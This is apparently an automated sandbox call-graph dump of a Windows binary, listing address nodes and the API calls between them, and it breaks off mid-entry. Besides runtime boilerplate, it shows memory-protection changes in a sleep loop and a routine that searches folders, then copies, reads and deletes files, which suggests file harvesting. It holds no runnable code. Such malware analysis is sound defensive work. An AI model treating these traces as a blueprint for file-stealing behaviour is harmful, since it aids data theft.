7475->7479 7476->7479 7481 37566368 20 API calls 7476->7481 7478 37566368 20 API calls 7477->7478 7480 3756706f 7478->7480 7479->7459 7482 375662ac 26 API calls 7480->7482 7481->7480 7482->7479 7483->7468 7484 375673d5 7485 375673e1 7484->7485 7496 37565671 RtlEnterCriticalSection 7485->7496 7487 375673e8 7497 37568be3 7487->7497 7489 375673f7 7495 37567406 7489->7495 7510 37567269 GetStartupInfoW 7489->7510 7494 37567417 7521 37567422 7495->7521 7496->7487 7498 37568bef 7497->7498 7499 37568c13 7498->7499 7500 37568bfc 7498->7500 7524 37565671 RtlEnterCriticalSection 7499->7524 7501 37566368 20 API calls 7500->7501 7503 37568c01 7501->7503 7504 375662ac 26 API calls 7503->7504 7505 37568c0b 7504->7505 7505->7489 7506 37568c4b 7532 37568c72 7506->7532 7508 37568c1f 7508->7506 7525 37568b34 7508->7525 7511 37567286 7510->7511 7512 37567318 7510->7512 7511->7512 7513 37568be3 27 API calls 7511->7513 7516 3756731f 7512->7516 7514 375672af 7513->7514 7514->7512 7515 375672dd GetFileType 7514->7515 7515->7514 7517 37567326 7516->7517 7518 37567369 GetStdHandle 7517->7518 7519 375673d1 7517->7519 7520 3756737c GetFileType 7517->7520 7518->7517 7519->7495 7520->7517 7536 375656b9 RtlLeaveCriticalSection 7521->7536 7523 37567429 7523->7494 7524->7508 7526 3756637b 20 API calls 7525->7526 7529 37568b46 7526->7529 7527 37568b53 7528 3756571e 20 API calls 7527->7528 7530 37568ba5 7528->7530 7529->7527 7531 37565eb7 11 API calls 7529->7531 7530->7508 7531->7529 7535 375656b9 RtlLeaveCriticalSection 7532->7535 7534 37568c79 7534->7505 7535->7534 7536->7523 7537 375636d0 7538 375636e2 7537->7538 7540 375636f0 7537->7540 7539 37562ada 5 API calls 7538->7539 7539->7540 7664 37563c90 RtlUnwind 6024 37565351 6025 37565360 6024->6025 6030 37565374 6024->6030 6028 3756571e 20 API calls 6025->6028 6025->6030 6026 3756571e 20 API calls 6027 37565386 6026->6027 6029 3756571e 20 API calls 6027->6029 6028->6030 6031 37565399 6029->6031 6030->6026 6032 3756571e 20 API calls 6031->6032 6033 375653aa 6032->6033 6034 3756571e 20 API calls 6033->6034 6035 375653bb 6034->6035 6919 3756281c 6920 37562882 27 API calls 6919->6920 6921 3756282a 6920->6921 7541 37564bdd 7542 37564bec 7541->7542 7543 37564c08 7541->7543 7542->7543 7545 37564bf2 7542->7545 7544 37566d60 51 API calls 7543->7544 7546 37564c0f GetModuleFileNameA 7544->7546 7547 37566368 20 API calls 7545->7547 7549 37564c33 7546->7549 7548 37564bf7 7547->7548 7550 375662ac 26 API calls 7548->7550 7564 37564d01 7549->7564 7551 37564c01 7550->7551 7556 37564c66 7559 37566368 20 API calls 7556->7559 7557 37564c72 7558 37564d01 38 API calls 7557->7558 7561 37564c88 7558->7561 7563 37564c6b 7559->7563 7560 3756571e 20 API calls 7560->7551 7562 3756571e 20 API calls 7561->7562 7561->7563 7562->7563 7563->7560 7566 37564d26 7564->7566 7568 37564d86 7566->7568 7576 375670eb 7566->7576 7567 37564c50 7570 37564e76 7567->7570 7568->7567 7569 375670eb 38 API calls 7568->7569 7569->7568 7571 37564e8b 7570->7571 7572 37564c5d 7570->7572 7571->7572 7573 3756637b 20 API calls 7571->7573 7572->7556 7572->7557 7574 37564eb9 7573->7574 7575 3756571e 20 API calls 7574->7575 7575->7572 7579 37567092 7576->7579 7580 375654a7 38 API calls 7579->7580 7581 375670a6 7580->7581 7581->7566 7665 37564a9a 7668 37565411 7665->7668 7669 3756541d 7668->7669 7670 37565af6 38 API calls 7669->7670 7671 37565422 7670->7671 7672 375655a8 38 API calls 7671->7672 7673 3756544c 7672->7673 5794 34a3947 5795 34a398b 5794->5795 5795->5794 5796 34a39c6 NtProtectVirtualMemory 5795->5796 5797 34a39b7 Sleep 5795->5797 5796->5795 5797->5794 5798 37561c5b 5799 37561c6b 5798->5799 5802 375612ee 5799->5802 5801 37561c87 5803 37561324 5802->5803 5804 375613b7 GetEnvironmentVariableW 5803->5804 5828 375610f1 5804->5828 5807 375610f1 57 API calls 5808 37561465 5807->5808 5809 375610f1 57 API calls 5808->5809 5810 37561479 5809->5810 5811 375610f1 57 API calls 5810->5811 5812 3756148d 5811->5812 5813 375610f1 57 API calls 5812->5813 5814 375614a1 5813->5814 5815 375610f1 57 API calls 5814->5815 5816 375614b5 lstrlenW 5815->5816 5817 375614d9 lstrlenW 5816->5817 5827 375614d2 5816->5827 5818 375610f1 57 API calls 5817->5818 5819 37561501 lstrlenW lstrcatW 5818->5819 5820 375610f1 57 API calls 5819->5820 5821 37561539 lstrlenW lstrcatW 5820->5821 5822 375610f1 57 API calls 5821->5822 5823 3756156b lstrlenW lstrcatW 5822->5823 5824 375610f1 57 API calls 5823->5824 5825 3756159d lstrlenW lstrcatW 5824->5825 5826 375610f1 57 API calls 5825->5826 5826->5827 5827->5801 5829 37561118 5828->5829 5830 37561129 lstrlenW 5829->5830 5841 37562c40 5830->5841 5833 37561177 lstrlenW FindFirstFileW 5835 375611a0 5833->5835 5836 375611e1 5833->5836 5834 37561168 lstrlenW 5834->5833 5837 375611c7 FindNextFileW 5835->5837 5840 375611aa 5835->5840 5836->5807 5837->5835 5839 375611da FindClose 5837->5839 5839->5836 5840->5837 5843 37561000 5840->5843 5842 37561148 lstrcatW lstrlenW 5841->5842 5842->5833 5842->5834 5844 37561022 5843->5844 5845 375610af 5844->5845 5846 3756102f lstrcatW lstrlenW 5844->5846 5849 375610b5 lstrlenW 5845->5849 5859 375610ad 5845->5859 5847 3756105a lstrlenW 5846->5847 5848 3756106b lstrlenW 5846->5848 5847->5848 5860 37561e89 lstrlenW 5848->5860 5874 37561e16 5849->5874 5852 37561088 GetFileAttributesW 5854 3756109c 5852->5854 5852->5859 5853 375610ca 5855 37561e89 5 API calls 5853->5855 5853->5859 5854->5859 5866 3756173a 5854->5866 5856 375610df 5855->5856 5879 375611ea 5856->5879 5859->5840 5861 37562c40 5860->5861 5862 37561ea7 lstrcatW lstrlenW 5861->5862 5863 37561ec2 5862->5863 5864 37561ed1 lstrcatW 5862->5864 5863->5864 5865 37561ec7 lstrlenW 5863->5865 5864->5852 5865->5864 5867 37561747 5866->5867 5894 37561cca 5867->5894 5870 3756199f 5870->5859 5872 37561824 5872->5870 5914 375615da 5872->5914 5875 37561e29 5874->5875 5878 37561e4c 5874->5878 5876 37561e2d lstrlenW 5875->5876 5875->5878 5877 37561e3f lstrlenW 5876->5877 5876->5878 5877->5878 5878->5853 5880 3756120e 5879->5880 5881 37561e89 5 API calls 5880->5881 5882 37561220 GetFileAttributesW 5881->5882 5883 37561246 5882->5883 5884 37561235 5882->5884 5885 37561e89 5 API calls 5883->5885 5884->5883 5886 3756173a 35 API calls 5884->5886 5887 37561258 5885->5887 5886->5883 5888 375610f1 56 API calls 5887->5888 5889 3756126d 5888->5889 5890 37561e89 5 API calls 5889->5890 5891 3756127f 5890->5891 5892 375610f1 56 API calls 5891->5892 5893 375612e6 5892->5893 5893->5859 5895 37561cf1 5894->5895 5896 37561d0f CopyFileW CreateFileW 5895->5896 5897 37561d44 DeleteFileW 5896->5897 5898 37561d55 GetFileSize 5896->5898 5903 37561808 5897->5903 5899 37561ede 22 API calls 5898->5899 5900 37561d66 ReadFile 5899->5900 5901 37561d94 CloseHandle DeleteFileW 5900->5901 5902 37561d7d CloseHandle DeleteFileW 5900->5902 5901->5903 5902->5903 5903->5870 5904 37561ede 5903->5904 5906 3756222f 5904->5906 5907 3756224e 5906->5907 5910 37562250 5906->5910 5922 3756474f 5906->5922 5927 375647e5 5906->5927 5907->5872 5909 37562908 5911 375635d2 RaiseException 5909->5911 5910->5909 5934 375635d2 5910->5934 5913 37562925 5911->5913 5913->5872 5915 3756160c 5914->5915 5916 3756163c lstrlenW 5915->5916 6022 37561c9d 5916->6022 5918 37561655 lstrcatW lstrlenW 5919 37561678 5918->5919 5920 37561693 5919->5920 5921 3756167e lstrcatW 5919->5921 5920->5872 5921->5920 5937 37564793 5922->5937 5924 37564765 5943 37562ada 5924->5943 5926 3756478f 5926->5906 5933 375656d0 5927->5933 5928 3756570e 5956 37566368 5928->5956 5930 375656f9 RtlAllocateHeap 5931 3756570c 5930->5931 5930->5933 5931->5906 5932 3756474f 7 API calls 5932->5933 5933->5928 5933->5930 5933->5932 5935 375635f2 RaiseException 5934->5935 5935->5909 5938 3756479f 5937->5938 5950 37565671 RtlEnterCriticalSection 5938->5950 5940 375647aa 5951 375647dc 5940->5951 5942 375647d1 5942->5924 5944 37562ae5 IsProcessorFeaturePresent 5943->5944 5945 37562ae3 5943->5945 5947 37562b58 5944->5947 5945->5926 5955 37562b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5947->5955 5949 37562c3b 5949->5926 5950->5940 5954 375656b9 RtlLeaveCriticalSection 5951->5954 5953 375647e3 5953->5942 5954->5953 5955->5949 5959 37565b7a GetLastError 5956->5959 5960 37565b93 5959->5960 5961 37565b99 5959->5961 5978 37565e08 5960->5978 5965 37565bf0 SetLastError 5961->5965 5985 3756637b 5961->5985 5967 37565bf9 5965->5967 5966 37565bb3 5992 3756571e 5966->5992 5967->5931 5971 37565bb9 5973 37565be7 SetLastError 5971->5973 5972 37565bcf 6005 3756593c 5972->6005 5973->5967 5976 3756571e 17 API calls 5977 37565be0 5976->5977 5977->5965 5977->5973 6010 37565c45 5978->6010 5980 37565e2f 5981 37565e47 TlsGetValue 5980->5981 5982 37565e3b 5980->5982 5981->5982 5983 37562ada 5 API calls 5982->5983 5984 37565e58 5983->5984 5984->5961 5990 37566388 5985->5990 5986 375663c8 5988 37566368 19 API calls 5986->5988 5987 375663b3 RtlAllocateHeap 5989 37565bab 5987->5989 5987->5990 5988->5989 5989->5966 5998 37565e5e 5989->5998 5990->5986 5990->5987 5991 3756474f 7 API calls 5990->5991 5991->5990 5993 37565752 5992->5993 5994 37565729 HeapFree 5992->5994 5993->5971 5994->5993 5995 3756573e 5994->5995 5996 37566368 18 API calls 5995->5996 5997 37565744 GetLastError 5996->5997 5997->5993 5999 37565c45 5 API calls 5998->5999 6000 37565e85 5999->6000 6001 37565ea0 TlsSetValue 6000->6001 6004 37565e94 6000->6004 6001->6004 6002 37562ada 5 API calls 6003 37565bc8 6002->6003 6003->5966 6003->5972 6004->6002 6016 37565914 6005->6016 6011 37565c75 6010->6011 6013 37565c71 6010->6013 6011->5980 6012 37565ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6012->6013 6013->6011 6013->6012 6015 37565c95 6013->6015 6014 37565ca1 GetProcAddress 6014->6011 6015->6011 6015->6014 6017 37565854 RtlEnterCriticalSection RtlLeaveCriticalSection 6016->6017 6018 37565938 6017->6018 6019 375658c4 6018->6019 6020 37565758 20 API calls 6019->6020 6021 375658e8 6020->6021 6021->5976 6023 37561ca6 6022->6023 6023->5918 7582 3756a1c6 IsProcessorFeaturePresent 7583 37567bc7 7584 37567bd3 7583->7584 7585 37567c0a 7584->7585 7591 37565671 RtlEnterCriticalSection 7584->7591 7587 37567be7 7588 37567f86 20 API calls 7587->7588 7589 37567bf7 7588->7589 7592 37567c10 7589->7592 7591->7587 7595 375656b9 RtlLeaveCriticalSection 7592->7595 7594 37567c17 7594->7585 7595->7594 6036 3756a945 6038 3756a96d 6036->6038 6037 3756a9a5 6038->6037 6039 3756a997 6038->6039 6040 3756a99e 6038->6040 6045 3756aa17 6039->6045 6049 3756aa00 6040->6049 6046 3756aa20 6045->6046 6053 3756b19b 6046->6053 6050 3756aa20 6049->6050 6051 3756b19b 21 API calls 6050->6051 6052 3756a9a3 6051->6052 6056 3756b1da 6053->6056 6054 3756b25c 6057 3756b286 6054->6057 6066 375678a3 6054->6066 6056->6054 6063 3756b59e 6056->6063 6059 3756b292 6057->6059 6070 3756b8b2 6057->6070 6060 37562ada 5 API calls 6059->6060 6062 3756a99c 6060->6062 6077 3756b5c1 6063->6077 6067 375678cb 6066->6067 6068 37562ada 5 API calls 6067->6068 6069 375678e8 6068->6069 6069->6057 6071 3756b8d4 6070->6071 6072 3756b8bf 6070->6072 6074 37566368 20 API calls 6071->6074 6073 3756b8d9 6072->6073 6075 37566368 20 API calls 6072->6075 6073->6059 6074->6073 6076 3756b8cc 6075->6076 6076->6059 6078 3756b5ec 6077->6078 6079 3756b7e5 RaiseException 6078->6079 6080 3756b5bc 6079->6080 6080->6054 6081 3756af43 6082 3756af4d 6081->6082 6083 3756af59 6081->6083 6082->6083 6084 3756af52 CloseHandle 6082->6084 6084->6083 6922 37565303 6925 375650a5 6922->6925 6934 3756502f 6925->6934 6928 3756502f 5 API calls 6929 375650c3 6928->6929 6930 37565000 20 API calls 6929->6930 6931 375650ce 6930->6931 6932 37565000 20 API calls 6931->6932 6933 375650d9 6932->6933 6935 37565048 6934->6935 6936 37562ada 5 API calls 6935->6936 6937 37565069 6936->6937 6937->6928 6938 37567103 GetCommandLineA GetCommandLineW 6085 37568640 6088 37568657 6085->6088 6089 37568665 6088->6089 6090 37568679 6088->6090 6091 37566368 20 API calls 6089->6091 6092 37568693 6090->6092 6093 37568681 6090->6093 6094 3756866a 6091->6094 6100 37568652 6092->6100 6104 375654a7 6092->6104 6095 37566368 20 API calls 6093->6095 6101 375662ac 6094->6101 6098 37568686 6095->6098 6099 375662ac 26 API calls 6098->6099 6099->6100 6112 37566231 6101->6112 6103 375662b8 6103->6100 6105 375654c4 6104->6105 6111 375654ba 6104->6111 6105->6111 6133 37565af6 GetLastError 6105->6133 6107 375654e5 6153 37567a00 6107->6153 6111->6100 6113 37565b7a 20 API calls 6112->6113 6114 37566247 6113->6114 6115 37566255 6114->6115 6116 375662a6 6114->6116 6121 37562ada 5 API calls 6115->6121 6123 375662bc IsProcessorFeaturePresent 6116->6123 6118 375662ab 6119 37566231 26 API calls 6118->6119 6120 375662b8 6119->6120 6120->6103 6122 3756627c 6121->6122 6122->6103 6124 375662c7 6123->6124 6127 375660e2 6124->6127 6128 375660fe 6127->6128 6129 3756612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6128->6129 6130 375661fb 6129->6130 6131 37562ada 5 API calls 6130->6131 6132 37566219 GetCurrentProcess TerminateProcess 6131->6132 6132->6118 6134 37565b0c 6133->6134 6138 37565b12 6133->6138 6136 37565e08 11 API calls 6134->6136 6135 3756637b 20 API calls 6137 37565b24 6135->6137 6136->6138 6140 37565b2c 6137->6140 6141 37565e5e 11 API calls 6137->6141 6138->6135 6139 37565b61 SetLastError 6138->6139 6139->6107 6142 3756571e 20 API calls 6140->6142 6143 37565b41 6141->6143 6144 37565b32 6142->6144 6143->6140 6145 37565b48 6143->6145 6146 37565b6d SetLastError 6144->6146 6147 3756593c 20 API calls 6145->6147 6161 375655a8 6146->6161 6149 37565b53 6147->6149 6151 3756571e 20 API calls 6149->6151 6152 37565b5a 6151->6152 6152->6139 6152->6146 6154 37567a13 6153->6154 6155 375654fe 6153->6155 6154->6155 6310 37567f0f 6154->6310 6157 37567a2d 6155->6157 6158 37567a55 6157->6158 6159 37567a40 6157->6159 6158->6111 6159->6158 6445 37566d7e 6159->6445 6172 37567613 6161->6172 6165 375655c2 IsProcessorFeaturePresent 6169 375655cd 6165->6169 6166 375655e0 6202 37564bc1 6166->6202 6168 375655b8 6168->6165 6168->6166 6171 375660e2 8 API calls 6169->6171 6171->6166 6205 37567581 6172->6205 6175 3756766e 6176 3756767a 6175->6176 6177 37565b7a 20 API calls 6176->6177 6178 375676a1 6176->6178 6182 375676a7 6176->6182 6177->6178 6179 375676f3 6178->6179 6178->6182 6201 375676d6 6178->6201 6180 37566368 20 API calls 6179->6180 6181 375676f8 6180->6181 6183 375662ac 26 API calls 6181->6183 6187 3756771f 6182->6187 6219 37565671 RtlEnterCriticalSection 6182->6219 6183->6201 6189 3756777e 6187->6189 6190 37567776 6187->6190 6198 375677a9 6187->6198 6220 375656b9 RtlLeaveCriticalSection 6187->6220 6189->6198 6221 37567665 6189->6221 6193 37564bc1 28 API calls 6190->6193 6193->6189 6195 37565af6 38 API calls 6199 3756780c 6195->6199 6197 37567665 38 API calls 6197->6198 6224 3756782e 6198->6224 6200 37565af6 38 API calls 6199->6200 6199->6201 6200->6201 6228 3756bdc9 6201->6228 6232 3756499b 6202->6232 6208 37567527 6205->6208 6207 375655ad 6207->6168 6207->6175 6209 37567533 6208->6209 6214 37565671 RtlEnterCriticalSection 6209->6214 6211 37567541 6215 37567575 6211->6215 6213 37567568 6213->6207 6214->6211 6218 375656b9 RtlLeaveCriticalSection 6215->6218 6217 3756757f 6217->6213 6218->6217 6219->6187 6220->6190 6222 37565af6 38 API calls 6221->6222 6223 3756766a 6222->6223 6223->6197 6225 37567834 6224->6225 6227 375677fd 6224->6227 6231 375656b9 RtlLeaveCriticalSection 6225->6231 6227->6195 6227->6199 6227->6201 6229 37562ada 5 API calls 6228->6229 6230 3756bdd4 6229->6230 6230->6230 6231->6227 6234 375649a7 6232->6234 6233 375649bf 6263 37565671 RtlEnterCriticalSection 6233->6263 6234->6233 6254 37564af5 GetModuleHandleW 6234->6254 6238 37564a65 6271 37564aa5 6238->6271 6242 37564a3c 6245 37564a54 6242->6245 6267 37564669 6242->6267 6243 37564a82 6274 37564ab4 6243->6274 6244 37564aae 6249 3756bdc9 5 API calls 6244->6249 6251 37564669 5 API calls 6245->6251 6246 375649c7 6246->6238 6246->6242 6264 3756527a 6246->6264 6253 37564ab3 6249->6253 6251->6238 6255 375649b3 6254->6255 6255->6233 6256 37564b39 GetModuleHandleExW 6255->6256 6257 37564b63 GetProcAddress 6256->6257 6258 37564b78 6256->6258 6257->6258 6259 37564b95 6258->6259 6260 37564b8c FreeLibrary 6258->6260 6261 37562ada 5 API calls 6259->6261 6260->6259 6262 37564b9f 6261->6262 6262->6233 6263->6246 6282 37565132 6264->6282 6270 37564698 6267->6270 6268 37562ada 5 API calls 6269 375646c1 6268->6269 6269->6245 6270->6268 6303 375656b9 RtlLeaveCriticalSection 6271->6303 6273 37564a7e 6273->6243 6273->6244 6304 37566025 6274->6304 6277 37564ae2 6280 37564b39 8 API calls 6277->6280 6278 37564ac2 GetPEB 6278->6277 6279 37564ad2 GetCurrentProcess TerminateProcess 6278->6279 6279->6277 6281 37564aea ExitProcess 6280->6281 6285 375650e1 6282->6285 6284 37565156 6284->6242 6286 375650ed 6285->6286 6293 37565671 RtlEnterCriticalSection 6286->6293 6288 375650fb 6294 3756515a 6288->6294 6292 37565119 6292->6284 6293->6288 6297 37565182 6294->6297 6298 3756517a 6294->6298 6295 37562ada IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6296 37565108 6295->6296 6300 37565126 6296->6300 6297->6298 6299 3756571e 20 API calls 6297->6299 6298->6295 6299->6298 6301 375656b9 RtlLeaveCriticalSection 6300->6301 6302 37565130 6301->6302 6302->6292 6303->6273 6305 3756604a 6304->6305 6309 37566040 6304->6309 6306 37565c45 5 API calls 6305->6306 6306->6309 6307 37562ada 5 API calls 6308 37564abe 6307->6308 6308->6277 6308->6278 6309->6307 6311 37567f1b 6310->6311 6312 37565af6 38 API calls 6311->6312 6313 37567f24 6312->6313 6314 37567f72 6313->6314 6322 37565671 RtlEnterCriticalSection 6313->6322 6314->6155 6316 37567f42 6323 37567f86 6316->6323 6321 375655a8 38 API calls 6321->6314 6322->6316 6324 37567f94 6323->6324 6326 37567f56 6323->6326 6324->6326 6330 37567cc2 6324->6330 6327 37567f75 6326->6327 6444 375656b9 RtlLeaveCriticalSection 6327->6444 6329 37567f69 6329->6314 6329->6321 6331 37567cd8 6330->6331 6333 37567d42 6330->6333 6331->6333 6335 37567d0b 6331->6335 6340 3756571e 20 API calls 6331->6340 6334 3756571e 20 API calls 6333->6334 6357 37567d90 6333->6357 6336 37567d64 6334->6336 6337 37567d2d 6335->6337 6345 3756571e 20 API calls 6335->6345 6338 3756571e 20 API calls 6336->6338 6339 3756571e 20 API calls 6337->6339 6341 37567d77 6338->6341 6342 37567d37 6339->6342 6344 37567d00 6340->6344 6346 3756571e 20 API calls 6341->6346 6347 3756571e 20 API calls 6342->6347 6343 37567dfe 6348 3756571e 20 API calls 6343->6348 6358 375690ba 6344->6358 6350 37567d22 6345->6350 6351 37567d85 6346->6351 6347->6333 6354 37567e04 6348->6354 6386 375691b8 6350->6386 6356 3756571e 20 API calls 6351->6356 6352 37567d9e 6352->6343 6353 3756571e 20 API calls 6352->6353 6353->6352 6354->6326 6356->6357 6398 37567e35 6357->6398 6359 375690cb 6358->6359 6385 375691b4 6358->6385 6360 375690dc 6359->6360 6361 3756571e 20 API calls 6359->6361 6362 375690ee 6360->6362 6364 3756571e 20 API calls 6360->6364 6361->6360 6363 37569100 6362->6363 6365 3756571e 20 API calls 6362->6365 6366 37569112 6363->6366 6367 3756571e 20 API calls 6363->6367 6364->6362 6365->6363 6368 37569124 6366->6368 6369 3756571e 20 API calls 6366->6369 6367->6366 6370 37569136 6368->6370 6372 3756571e 20 API calls 6368->6372 6369->6368 6371 37569148 6370->6371 6373 3756571e 20 API calls 6370->6373 6374 3756915a 6371->6374 6375 3756571e 20 API calls 6371->6375 6372->6370 6373->6371 6376 3756571e 20 API calls 6374->6376 6378 3756916c 6374->6378 6375->6374 6376->6378 6377 3756917e 6379 37569190 6377->6379 6381 3756571e 20 API calls 6377->6381 6378->6377 6380 3756571e 20 API calls 6378->6380 6382 375691a2 6379->6382 6383 3756571e 20 API calls 6379->6383 6380->6377 6381->6379 6384 3756571e 20 API calls 6382->6384 6382->6385 6383->6382 6384->6385 6385->6335 6387 375691c5 6386->6387 6388 3756921d 6386->6388 6389 375691d5 6387->6389 6390 3756571e 20 API calls 6387->6390 6388->6337 6391 375691e7 6389->6391 6392 3756571e 20 API calls 6389->6392 6390->6389 6393 375691f9 6391->6393 6395 3756571e 20 API calls 6391->6395 6392->6391 6394 3756920b 6393->6394 6396 3756571e 20 API calls 6393->6396 6394->6388 6397 3756571e 20 API calls 6394->6397 6395->6393 6396->6394 6397->6388 6399 37567e42 6398->6399 6403 37567e60 6398->6403 6399->6403 6404 3756925d 6399->6404 6402 3756571e 20 API calls 6402->6403 6403->6352 6405 37567e5a 6404->6405 6406 3756926e 6404->6406 6405->6402 6440 37569221 6406->6440 6409 37569221 20 API calls 6410 37569281 6409->6410 6411 37569221 20 API calls 6410->6411 6412 3756928c 6411->6412 6413 37569221 20 API calls 6412->6413 6414 37569297 6413->6414 6415 37569221 20 API calls 6414->6415 6416 375692a5 6415->6416 6417 3756571e 20 API calls 6416->6417 6418 375692b0 6417->6418 6419 3756571e 20 API calls 6418->6419 6420 375692bb 6419->6420 6421 3756571e 20 API calls 6420->6421 6422 375692c6 6421->6422 6423 37569221 20 API calls 6422->6423 6424 375692d4 6423->6424 6425 37569221 20 API calls 6424->6425 6426 375692e2 6425->6426 6427 37569221 20 API calls 6426->6427 6428 375692f3 6427->6428 6429 37569221 20 API calls 6428->6429 6430 37569301 6429->6430 6431 37569221 20 API calls 6430->6431 6432 3756930f 6431->6432 6433 3756571e 20 API calls 6432->6433 6434 3756931a 6433->6434 6435 3756571e 20 API calls 6434->6435 6436 37569325 6435->6436 6437 3756571e 20 API calls 6436->6437 6438 37569330 6437->6438 6439 3756571e 20 API calls 6438->6439 6439->6405 6441 37569258 6440->6441 6442 37569248 6440->6442 6441->6409 6442->6441 6443 3756571e 20 API calls 6442->6443 6443->6442 6444->6329 6446 37566d8a 6445->6446 6447 37565af6 38 API calls 6446->6447 6449 37566d94 6447->6449 6451 37566e18 6449->6451 6452 375655a8 38 API calls 6449->6452 6453 3756571e 20 API calls 6449->6453 6454 37565671 RtlEnterCriticalSection 6449->6454 6455 37566e0f 6449->6455 6451->6158 6452->6449 6453->6449 6454->6449 6458 375656b9 RtlLeaveCriticalSection 6455->6458 6457 37566e16 6457->6449 6458->6457 7674 37567a80 7675 37567a8d 7674->7675 7676 3756637b 20 API calls 7675->7676 7677 37567aa7 7676->7677 7678 3756571e 20 API calls 7677->7678 7679 37567ab3 7678->7679 7680 3756637b 20 API calls 7679->7680 7684 37567ad9 7679->7684 7681 37567acd 7680->7681 7683 3756571e 20 API calls 7681->7683 7682 37565eb7 11 API calls 7682->7684 7683->7684 7684->7682 7685 37567ae5 7684->7685 6459 3756724e GetProcessHeap 6460 3756284f 6463 37562882 6460->6463 6466 37563550 6463->6466 6465 3756285d 6467 3756358a 6466->6467 6468 3756355d 6466->6468 6467->6465 6468->6467 6469 375647e5 21 API calls 6468->6469 6470 3756357a 6469->6470 6470->6467 6472 3756544d 6470->6472 6473 3756545a 6472->6473 6474 37565468 6472->6474 6473->6474 6478 3756547f 6473->6478 6475 37566368 20 API calls 6474->6475 6480 37565470 6475->6480 6476 375662ac 26 API calls 6477 3756547a 6476->6477 6477->6467 6478->6477 6479 37566368 20 API calls 6478->6479 6479->6480 6480->6476 6939 3756220c 6940 37562215 6939->6940 6941 3756221a 6939->6941 6945 375622b1 6940->6945 6949 375620db 6941->6949 6944 37562228 6946 375622c7 6945->6946 6948 375622d0 6946->6948 6957 37562264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6946->6957 6948->6941 6950 375620e7 6949->6950 6953 3756210b 6950->6953 6956 375620f6 6950->6956 6958 37561eec 6950->6958 6952 3756216d 6954 37561eec 50 API calls 6952->6954 6952->6956 6953->6952 6955 37561eec 50 API calls 6953->6955 6953->6956 6954->6956 6955->6952 6956->6944 6957->6948 6959 37561ef7 6958->6959 6960 37561f2a 6958->6960 6962 37561f1c 6959->6962 6963 37561efc 6959->6963 7001 37562049 6960->7001 6983 37561f3f 6962->6983 6964 37561f12 6963->6964 6965 37561f01 6963->6965 6975 375623ec 6964->6975 6969 37561f06 6965->6969 6970 3756240b 6965->6970 6969->6953 7015 375653e5 6970->7015 7111 37563513 6975->7111 6980 37562408 6980->6969 6981 3756351e 7 API calls 6982 375623f5 6981->6982 6982->6969 6984 37561f4b 6983->6984 7129 3756247c 6984->7129 6986 37561f52 6987 37562041 6986->6987 6988 37561f7c 6986->6988 6994 37561f57 6986->6994 7152 37562639 IsProcessorFeaturePresent 6987->7152 7140 375623de 6988->7140 6991 37562048 6992 37561f8b 6992->6994 7143 375622fc RtlInitializeSListHead 6992->7143 6994->6969 6995 37561f99 7144 375646c5 6995->7144 6999 37561fb8 6999->6994 7000 37564669 5 API calls 6999->7000 7000->6994 7002 37562055 7001->7002 7003 375620d3 7002->7003 7004 3756207d 7002->7004 7014 3756205e 7002->7014 7005 37562639 4 API calls 7003->7005 7204 3756244c 7004->7204 7007 375620da 7005->7007 7008 37562082 7213 37562308 7008->7213 7010 37562087 7216 375620c4 7010->7216 7012 3756209f 7219 3756260b 7012->7219 7014->6969 7021 37565aca 7015->7021 7018 3756351e 7095 37563820 7018->7095 7020 37562415 7020->6969 7022 37565ad4 7021->7022 7023 37562410 7021->7023 7024 37565e08 11 API calls 7022->7024 7023->7018 7025 37565adb 7024->7025 7025->7023 7026 37565e5e 11 API calls 7025->7026 7027 37565aee 7026->7027 7029 375659b5 7027->7029 7030 375659d0 7029->7030 7031 375659c0 7029->7031 7030->7023 7035 375659d6 7031->7035 7034 3756571e 20 API calls 7034->7030 7036 375659ef 7035->7036 7037 375659e9 7035->7037 7039 3756571e 20 API calls 7036->7039 7038 3756571e 20 API calls 7037->7038 7038->7036 7040 375659fb 7039->7040 7041 3756571e 20 API calls 7040->7041 7042 37565a06 7041->7042 7043 3756571e 20 API calls 7042->7043 7044 37565a11 7043->7044 7045 3756571e 20 API calls 7044->7045 7046 37565a1c 7045->7046 7047 3756571e 20 API calls 7046->7047 7048 37565a27 7047->7048 7049 3756571e 20 API calls 7048->7049 7050 37565a32 7049->7050 7051 3756571e 20 API calls 7050->7051 7052 37565a3d 7051->7052 7053 3756571e 20 API calls 7052->7053 7054 37565a48 7053->7054 7055 3756571e 20 API calls 7054->7055 7056 37565a56 7055->7056 7061 3756589c 7056->7061 7067 375657a8 7061->7067 7063 375658c0 7064 375658ec 7063->7064 7079 37565809 7064->7079 7066 37565910 7066->7034 7068 375657b4 7067->7068 7075 37565671 RtlEnterCriticalSection 7068->7075 7071 375657be 7072 3756571e 20 API calls 7071->7072 7074 375657e8 7071->7074 7072->7074 7073 375657f5 7073->7063 7076 375657fd 7074->7076 7075->7071 7077 375656b9 RtlLeaveCriticalSection 7076->7077 7078 37565807 7077->7078 7078->7073 7080 37565815 7079->7080 7087 37565671 RtlEnterCriticalSection 7080->7087 7082 3756581f 7088 37565a7f 7082->7088 7084 37565832 7092 37565848 7084->7092 7086 37565840 7086->7066 7087->7082 7089 37565a8e 7088->7089 7091 37565ab5 7088->7091 7090 37567cc2 20 API calls 7089->7090 7089->7091 7090->7091 7091->7084 7093 375656b9 RtlLeaveCriticalSection 7092->7093 7094 37565852 7093->7094 7094->7086 7096 3756382d 7095->7096 7100 3756384b 7095->7100 7097 3756383b 7096->7097 7101 37563b67 7096->7101 7106 37563ba2 7097->7106 7100->7020 7102 37563a82 5 API calls 7101->7102 7103 37563b81 7102->7103 7104 37563b99 TlsGetValue 7103->7104 7105 37563b8d 7103->7105 7104->7105 7105->7097 7107 37563a82 5 API calls 7106->7107 7108 37563bbc 7107->7108 7109 37563bd7 TlsSetValue 7108->7109 7110 37563bcb 7108->7110 7109->7110 7110->7100 7117 37563856 7111->7117 7113 375623f1 7113->6982 7114 375653da 7113->7114 7115 37565b7a 20 API calls 7114->7115 7116 375623fd 7115->7116 7116->6980 7116->6981 7118 37563862 GetLastError 7117->7118 7119 3756385f 7117->7119 7120 37563b67 6 API calls 7118->7120 7119->7113 7121 37563877 7120->7121 7122 